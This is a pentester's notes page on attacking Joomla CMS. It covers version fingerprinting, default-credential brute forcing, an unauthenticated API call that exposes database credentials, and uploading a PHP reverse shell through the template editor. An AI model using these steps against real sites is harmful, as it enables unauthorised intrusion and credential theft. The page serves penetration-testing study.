Joomla CMS

attacking_common_applications

Joomla is an open-source Content Management System (CMS) written in PHP. Version 5 is currently in development (2024).

You can see the distribution of active Joomla installations here.

The admin panel default URI is: /administrator.


Joomla Pentester Notes ☠️

attacking_common_applications devvortex

The /robots.txt file may contain a list of interesting paths. If the website was not properly configured, /README.txt may be accessible. The page source may also contain a <meta name="generator" ...> tag.

In some versions, we may be able to access /administrator/manifests/files/joomla.xml, /media/system/js/, or /plugins/system/cache/cache.xml (rather unreliable and outdated) to find the version.

$ curl [...].xml | xmllint --format -
  • OWASP initiated the development of joomscan (1.0k ⭐)
$ sudo apt install joomscan
$ joomscan -u URL
[+] Detecting Joomla Version
[++] Joomla x.y.z

<SNIP... Nothing of interest>
  • You can try to use droopescan (not really useful)
$ droopescan scan joomla --url URL
<SNIP... Nothing of interest>
  • You can try to use JoomlaScan (0.1k ⭐, 2022 🪦)
  • Default username: admin. Password set at install time. You can test default credentials using joomla-bruteforce (0.02k ⭐, 2020 🪦), but you should not use it for real brute force (it sucks...).
$ wget https://github.com/ajnik/joomla-bruteforce/raw/master/joomla-brute.py
$ cp /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt .
$ python joomla-brute.py -u URL -w http_default_pass.txt --username admin -v
Some versions expose the site configuration, including the database credentials, through the public API without authentication:

$ curl -v URL/api/index.php/v1/config/application?public=true
"dbtype": "mysqli",
"host": "localhost",
"user": "xxx",
"password": "yyy",
"db": "joomla",
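The two disclosures above (the version in the file manifest, and the settings the public config endpoint returns) can be checked offline against captured responses. This is an added example, not part of the original notes; the manifest and JSON samples are constructed, and the JSON:API layout it assumes (one setting per `data` item, merged together) is an assumption.

```python
import json
import xml.etree.ElementTree as ET

# Constructed sample of administrator/manifests/files/joomla.xml (minimal shape).
SAMPLE_MANIFEST = """<extension type="file" method="upgrade">
  <name>files_joomla</name>
  <version>4.2.6</version>
</extension>"""

# Constructed sample of the config endpoint response. Assumption: a JSON:API
# document where each data[] item carries one setting in its attributes.
SAMPLE_CONFIG_RESPONSE = json.dumps({"data": [
    {"type": "application", "id": "224", "attributes": {"dbtype": "mysqli"}},
    {"type": "application", "id": "224", "attributes": {"host": "localhost"}},
    {"type": "application", "id": "224", "attributes": {"user": "xxx"}},
    {"type": "application", "id": "224", "attributes": {"password": "yyy"}},
    {"type": "application", "id": "224", "attributes": {"db": "joomla"}},
]})

# Settings that must never reach an unauthenticated caller (the ones shown above).
SENSITIVE_KEYS = {"host", "user", "password", "db"}


def manifest_version(xml_text):
    """Return the <version> text of a Joomla file manifest, or None if absent."""
    node = ET.fromstring(xml_text).find("version")
    return node.text.strip() if node is not None and node.text else None


def merged_attributes(body):
    """Flatten data[].attributes of a JSON:API document into a single dict."""
    merged = {}
    for item in json.loads(body).get("data", []):
        merged.update(item.get("attributes", {}))
    return merged


def leaked_keys(body):
    """Sorted list of sensitive settings present in a config endpoint response."""
    return sorted(k for k in merged_attributes(body) if k in SENSITIVE_KEYS)


def audit(manifest_xml, config_body):
    """Summarise what an unauthenticated visitor learns from the two responses."""
    return {"version": manifest_version(manifest_xml),
            "leaked": leaked_keys(config_body)}


if __name__ == "__main__":
    print(audit(SAMPLE_MANIFEST, SAMPLE_CONFIG_RESPONSE))
```

Feed it the bodies saved from the two curl commands above; an empty `leaked` list means the endpoint only returned public settings.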

In Joomla 3, navigate to Configuration > Templates > Templates. In Joomla 4, navigate to System > Site Templates. Select a template, then create a new file or upload one if you can. You can copy-paste a shell:

$ cat revshell.php | xclip -selection clipboard

The file path is shown in the editor; for reference, mine was at URL/templates/<your_selected_site_name>/revshell.php.


👻 To-do 👻

Stuff I found but haven't read/used yet.

  • /images, /home, /media, /templates, /modules
  • /plugins, /includes, /language, /components, /api
  • /cache, /libraries, /tmp, /layouts, /administrator
  • /media/templates/site/<name>/assets/